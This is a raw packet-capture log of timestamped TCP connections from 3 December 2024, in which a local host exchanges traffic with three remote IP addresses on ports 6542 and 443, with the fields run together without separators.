                                                                                                                                                                              Dec 3, 2024 17:43:24.574039936 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.574095011 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.578125954 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.578176975 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.578324080 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.578377008 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.582331896 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.582381010 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.582467079 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.582901001 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.586550951 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.586643934 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.586711884 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.586850882 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.590856075 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.590933084 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.591083050 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.591125965 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.594981909 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.595118046 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.595161915 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.599191904 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.599245071 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.599338055 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.599376917 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.603497982 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.603554010 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.603657961 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.603769064 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.607573986 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.607743979 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.607860088 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.611792088 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.611965895 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.612030029 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.616008997 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.616144896 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.616214991 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.620206118 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.620414019 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.620462894 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.624387980 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.624694109 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.624742985 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.628654957 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.628827095 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.628875017 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.632930040 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.633117914 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.633167982 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.637202978 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.637254953 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.637367964 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.676139116 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.676373959 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.676486969 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.678174973 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.679019928 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.679073095 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.679239035 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.679280043 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.683197975 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.683262110 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.683440924 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.683480978 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.687429905 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.687623978 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.687669992 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.691605091 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.691725969 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.691783905 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.766482115 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.766717911 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.766774893 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.768589973 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.768656969 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.768815041 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.769073963 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.771589041 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.771735907 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.771781921 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.775134087 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.775182962 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.775363922 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.777997017 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.778428078 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.778939009 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.778964996 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.778985977 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.781666994 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.781838894 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.781884909 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.785202026 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.785252094 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.785413980 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.785454988 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.788445950 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.788511038 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.788606882 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.788652897 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.791915894 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.791975975 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.792120934 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.792164087 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.795056105 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.795100927 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.795195103 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.795236111 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.798394918 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.798593044 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.798659086 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.801805019 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.801866055 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.801995993 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.805099010 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.805181026 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.805294037 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.805340052 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.807131052 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.807323933 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.807369947 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.809065104 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.809113979 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.809191942 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.809317112 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.810902119 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.811084986 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.811131954 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.812827110 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.812975883 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.813030005 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.814697027 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.814899921 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.814943075 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.816597939 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.816643000 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.816775084 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.817127943 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.818516970 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.818558931 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.818639994 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.818696976 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.820391893 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.820436001 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.820564032 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.820602894 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.822243929 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.822407961 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.822448015 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.824119091 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.824285030 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.824326038 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.825995922 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.826167107 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.826215982 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.827893972 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.827939034 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.828073025 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.829550982 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.829859972 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.829901934 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.829965115 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.830010891 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.831909895 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.831945896 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.832075119 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.832115889 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.833564997 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.833745956 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.833787918 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.835459948 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.835630894 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.835673094 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.837333918 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.837495089 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.837541103 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.839236021 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.839277983 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.839523077 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.841186047 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.841245890 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.841336012 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.843044996 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.843118906 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.843837023 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.843883038 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.843966961 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.845491886 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.845851898 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.845896959 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.846107006 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.846148014 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.847582102 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.847625017 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.848270893 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.848313093 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.848443031 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.848480940 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:43:24.850219965 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.850342989 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:24.850394011 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:44:47.189039946 CET654249730103.57.249.207192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:47.194964886 CET497306542192.168.2.4103.57.249.207
                                                                                                                                                                              Dec 3, 2024 17:44:53.090941906 CET49851443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:44:53.090965986 CET44349851104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:53.091144085 CET49851443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:44:53.091576099 CET49851443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:44:53.091587067 CET44349851104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:54.304260969 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:54.305747032 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:44:54.379807949 CET44349851104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:54.379890919 CET49851443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:44:54.413028955 CET49851443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:44:54.413055897 CET44349851104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:54.413367987 CET44349851104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:54.413485050 CET49851443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:44:54.415271044 CET49851443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:44:54.455339909 CET44349851104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:55.277708054 CET497326542192.168.2.494.232.43.224
                                                                                                                                                                              Dec 3, 2024 17:44:55.304539919 CET497306542192.168.2.4103.57.249.207
                                                                                                                                                                              Dec 3, 2024 17:44:55.398677111 CET65424973294.232.43.224192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:55.425040960 CET654249730103.57.249.207192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:55.962085009 CET44349851104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:55.962178946 CET44349851104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:55.962299109 CET49851443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:44:55.965372086 CET49851443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:44:55.965396881 CET44349851104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:56.842344999 CET49861443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:44:56.842396975 CET44349861104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:56.842508078 CET49861443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:44:56.842859030 CET49861443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:44:56.842874050 CET44349861104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:58.055161953 CET44349861104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:58.055216074 CET49861443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:44:58.055936098 CET49861443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:44:58.055943012 CET44349861104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:58.057636976 CET49861443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:44:58.057641029 CET44349861104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:59.611140013 CET44349861104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:59.611196041 CET49861443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:44:59.611213923 CET44349861104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:59.611282110 CET49861443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:44:59.611287117 CET44349861104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:59.611305952 CET44349861104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:59.611331940 CET49861443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:44:59.611350060 CET49861443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:44:59.614049911 CET49861443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:44:59.614064932 CET44349861104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:00.362154007 CET49869443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:00.362206936 CET44349869104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:00.362412930 CET49869443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:00.362616062 CET49869443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:00.362627029 CET44349869104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:01.629321098 CET44349869104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:01.629389048 CET49869443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:01.630249023 CET49869443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:01.630259037 CET44349869104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:01.632158041 CET49869443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:01.632165909 CET44349869104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:03.275394917 CET44349869104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:03.275459051 CET49869443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:03.275485039 CET44349869104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:03.275500059 CET44349869104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:03.275693893 CET49869443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:03.287527084 CET49869443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:03.287538052 CET44349869104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:04.158433914 CET49878443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:04.158478975 CET44349878104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:04.158545971 CET49878443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:04.158788919 CET49878443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:04.158797979 CET44349878104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:05.379667997 CET44349878104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:05.379757881 CET49878443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:05.418715954 CET49878443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:05.418746948 CET44349878104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:05.474450111 CET49878443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:05.474478960 CET44349878104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:07.016618013 CET44349878104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:07.016737938 CET44349878104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:07.016768932 CET49878443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:07.017587900 CET49878443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:07.017671108 CET49878443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:07.017688990 CET44349878104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:07.024852037 CET49886443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:07.024897099 CET44349886104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:07.025197983 CET49886443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:07.025496006 CET49886443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:07.025510073 CET44349886104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:08.341351986 CET44349886104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:08.346101999 CET49886443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:08.350594044 CET49886443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:08.350606918 CET44349886104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:10.164859056 CET49886443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:10.164876938 CET44349886104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:10.537086964 CET44349886104.21.68.89192.168.2.4
